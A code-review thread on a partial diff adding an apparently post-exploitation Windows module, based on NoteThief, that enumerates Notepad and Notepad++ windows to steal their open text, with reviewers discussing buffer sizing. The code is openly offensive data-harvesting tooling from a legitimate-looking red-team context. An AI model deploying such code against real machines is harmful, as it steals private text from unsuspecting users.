src/SA/notepad/entry.c

```diff
@@ -0,0 +1,75 @@
+#include <windows.h>
+#include "bofdefs.h"
+#include "base.c"
+/*	Idea based on https://github.com/trainr3kt/NoteThief
+	- The original only grabbed the highest level Z window
+	- Searches all visible windows with non-null names
+	- Adds ability to steal data from notepad++
+	- Could potentially be expanded to allow specification of a string to search for in Window Name and a string to correspond to a control
+*/
+
+BOOL CALLBACK EnumWindowClasses(HWND hWndParent, LPARAM lParam)
+{
+	char ClassName[128] = {0};
+	char WindowName[128] = {0};
+	char *buffer;
+	int len = 65535;
+	char *needle = (char*) lParam;
+	DWORD WinLen = USER32$GetClassNameA(hWndParent, ClassName, 127);
+	WinLen = USER32$GetWindowTextA(hWndParent, WindowName, 127);
+
+	if (ClassName[0] != 0 && WinLen){
+		if(MSVCRT$strcmp(ClassName, needle) == 0) {
+			buffer = (char*)MSVCRT$calloc(1, len+1);
```

Comment:
Its possible the to much or too little memory is being allocated.

I would suggest having a call to https://docs.microsoft.com/en-us/windows/win32/winmsg/wm-gettextlength and sending that to get the amount of text in the control.  Then you can allocate that size (+1 just in case for the null terminator) instead of always doing a static 65535.

Reply:
So, I am going to change this.  I set it to 65k to prevent the operator from being text wall bombed if there is a huge text file open.  I'm not sure what the right answer there is but will change as you suggested.

Reply:
fixed.